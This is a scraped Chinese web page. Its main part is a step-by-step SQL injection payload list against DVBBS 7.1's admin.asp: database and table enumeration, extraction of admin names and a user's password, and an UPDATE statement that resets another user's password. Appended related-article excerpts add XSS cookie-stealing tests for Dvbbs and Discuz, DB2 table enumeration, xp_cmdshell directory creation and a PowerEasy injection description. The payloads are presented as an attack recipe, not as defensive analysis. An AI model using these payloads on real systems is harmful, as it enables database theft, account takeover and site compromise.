DVBBS7.1 SQL版 跨库漏洞_漏洞研究

漏洞测试环境:DVBBS7.1 SQL 

受影响文件 

admin/admin.asp 

..... 

漏洞利用 

(select @@version)>0 获得Windows的版本号 

and user_name()='dbo' 判断当前系统的连接用户是不是sa 

(select user_name())>0 爆当前系统的连接用户 

(select db_name())>0 得到当前连接的数据库 

(select IS_MEMBER('db_owner')) --查询数据库当前用户权限 

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名 

(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名 

(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名 

(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID 

(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名 

(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名 

(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户 

(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码 

;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--  

时间: 2024-10-27 16:12:42

DVBBS7.1 SQL版 跨库漏洞_漏洞研究的相关文章

SQL Server 跨库同步数据

原文:SQL Server 跨库同步数据 最近有个需求是要跨库进行数据同步,两个数据库分布在两台物理计算机上,自动定期同步可以通过SQL Server代理作业来实现,但是前提是需要编写一个存储过程来实现同步逻辑处理.这里的存储过程用的不是opendatasource,而是用的链接服务器来实现的.存储过程创建在IP1:192.168.0.3服务器上,需要将视图v_custom的客户信息同步到IP2:192.168.0.10服务器上的t_custom表中.逻辑是如果不存在则插入,存在则更新字段.  

SQL Server 跨库同步数据_MsSql

最近有个需求是要跨库进行数据同步,两个数据库分布在两台物理计算机上,自动定期同步可以通过SQL Server代理作业来实现,但是前提是需要编写一个存储过程来实现同步逻辑处理.这里的存储过程用的不是opendatasource,而是用的链接服务器来实现的.存储过程创建在IP1:192.168.0.3服务器上,需要将视图v_custom的客户信息同步到IP2:192.168.0.10服务器上的t_custom表中.逻辑是如果不存在则插入,存在则更新字段. create PROCEDURE [dbo]

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞_漏洞研究

漏洞发现:LiNZI[B.C.T]@www.cnbct.org  厂商名字:动网先锋论谈  厂商地址:http://www.dvbbs.net/  漏洞程序:Dvbbs 7.1.0  漏洞描述:  Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等.  漏洞利用例子:  一.泄露绝对漏洞测试:  对官方的测试站点:bbs.dvbbs.net  上传一张图,代码如下:  GIF89a  <script>alert(document.c

BBSXP5.15跨站攻击漏洞_漏洞研究

前言:在新云网站管理系统1.02出来的时候,他的留言本就存在跨站漏洞,我测试了黑客动画吧,还好没有开放留言本功能,然后又测试了黑软基地 居然可以成功利用,和新云官方网站都成功拿倒了管理元的cookies.  想不到吧. 看来跨站不得不防范啊!  BBSXP的漏洞近段时间闹得可火.现有的漏洞大家都见过了,就不说了.今晚无聊,看了看BBSXP 5.15最新版的几个文件代码,发现还是存在跨站攻击的漏洞.  Cookies.asp文件,代码如下:   对提交的 "no" 参数没做处理.再看se

蓝雨设计整站SQL注入漏洞_漏洞研究

本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注入漏洞的,所以一切后果与我以及BCT小组无关  最近无聊,在网上走来走去看看.发现现在的整站系统可是越来越多了,修改版本等等的N多阿!而蓝雨设计整站的使用者也越来越多了,蓝雨整站系统是从NOWA 0.94修改而来的!基于NOWA的系统不单指蓝雨一个还有很多的!我在此就不一一列举了,核心都是一样,只是

PHP著名开源论坛:Discuz!跨站大全_漏洞研究

在discuz!的发贴.回贴.PM等中的subject都没有经过过滤,所以也可以添加代码.   例如   http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22   效果是首先弹出自己的cookie   利用方法:把上述代码放置到img中.   适用版本:discuz!2.x   discuz!3.x   一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试   通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描

Sql Injection in DB2数据库_漏洞研究

使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手.不过在网上很难找到相关的资料,只好自己研究了.  参考了IBM DB2的文档,总结了这样几条:  1.select NAME from SYSIBM.SYSTABLES where CREATOR =USER  可以返回系统中所有用户创建的表(table)名  2.select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''   返回表中的列名 

sql注入建立虚拟目录_漏洞研究

sql注入建立虚拟目录,免得找web绝对路径---------------------------------------------------------------- 我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l&qu

2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞_漏洞研究

测试系统:         动易(PowerEasy CMS SP6 071030以下版本) 安全综述:        动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品. 漏洞描述:     vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入     但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制.但是其过滤的顺序不对.有导致mss